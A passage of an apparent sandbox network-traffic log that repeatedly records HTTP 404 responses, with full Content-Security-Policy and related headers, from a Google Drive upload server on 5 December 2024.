      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:54 GMTContent-Security-Policy: script-src 'nonce-ZWCLr7XKLGW4va_yB5twHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5Z-QIukitg_Etj8K5EQRQqD8Py4uWAIGJ7iazhkSELJ7OndcfAmYvMrF6O2vOSc8wYf16Lg0XpqgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:05 GMTContent-Security-Policy: script-src 'nonce-mXI6D9fuzwTjOamT_f25Mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5ha9xwpAGxrF9AObB47bH3WAIOg5Dd4kjUqHgAI8dpB3bPp8hJh8_xpLuWp-VySRfzavYgkXhgxgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:16 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-7USCs70f41WRI35N-mWk4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC6qHkYESejmC0ulNAWyaT_t8XcQjCkB0xlVhRyBRpRN0R5KmXQ1crZPTUsJ3Heuv9hamgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-1_3vcwjgMho-ygVstGkFxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC52Tl_ttFYP4gDCv83-FtwoQuinsDNQ3GdMzGFJXtSxcBWC159WHpfjYuwadzqPbCQwmc4QFe5gPAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-F58rQQX3wQf1Sb5v-CAd6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC4JnoAhu0c9FvuTKN8n48KKwWEE0s7jCWS2h8TNfETV2BpQF2jSmwbKWCJ0yKmDundOBN_33ttGaAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-bqye9HMrsU07fFaF5gJCsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC43XaxlFqyVA6M2XyBvZI-18sVr_4K1WPuRpYXcq1cXD0RwaWHXuAYjpcX2gJDjHaAlK1l-bT25HAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:06:01 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-i-HzHjzfENGb9z2j9QZMjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC61E3qxaDeVNEsvXIHsiQHj78gIg4qxQweaHiarS-ubhhtCQEztpuSFvLjHQ_zrlX-yfpyB81GxRAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:06:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-T30503VURgHNMWOuDA9ZmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC4XmtXROYDrJAf5wxMMa53vWiWT9Fc0J9pfjHiSgmtxM8-oGbAnr9zHDWE238S6tlEP-0kServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:06:23 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-EUGawtJepS0rmDvgeaVD2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5p3TfNqwhLQDGbtA9TdF8symRv-IxCZ_boh5nDwpUbP7zmyM6AdUoYnhwb75WzVYl6Q84Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:06:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-kRnWbVoZtDj_hH9UADMkqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC5tl8ZQ-ipRAcWHtwDeHNhqTXV9OGaIma6ipvk_pbjlNoVraoZKjAQ_YAJcMuZF7fgy0nlJx2ZmJgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:06:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9iNSa6nnqSbIJLwkbGCOjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7gqIBTFdEzzed3t-As8R23MnUqxAe8k55HwSVR_dzHwjUKVmPtbLIybjWQUBMpVhLX1ZEServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:06:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-mpdCxqFwI6wT9LjjYOtFLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC68Z4rZQZ20kE5TPpoDQc7C4kBJqHtzGsbVDtl2F2dmCkRhPoWvXsRw1-kOAGGRxybYGyfIn1BZigServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:07:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-Cf9GuY1UAhc79GxP6I_Czw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6h-yGpyTBYgXE3_1WIVD4kuckgTHVGSxZ3ZxtAX7T6LGcOY_w8040ucy3hZ-JMiSjwyO7LweRRwwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:07:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-p4MEjeDn8eq7lz9hQjUC_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC4cutw_e6yuMkUxDL3Dm-QqjtqW3fJV2we6NAJx5JApZmdZUHFwgSXjmPodoOUeluqshdWG6CvSzAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:07:30 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-j8DlFE1tE1lSIpUz904DLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: 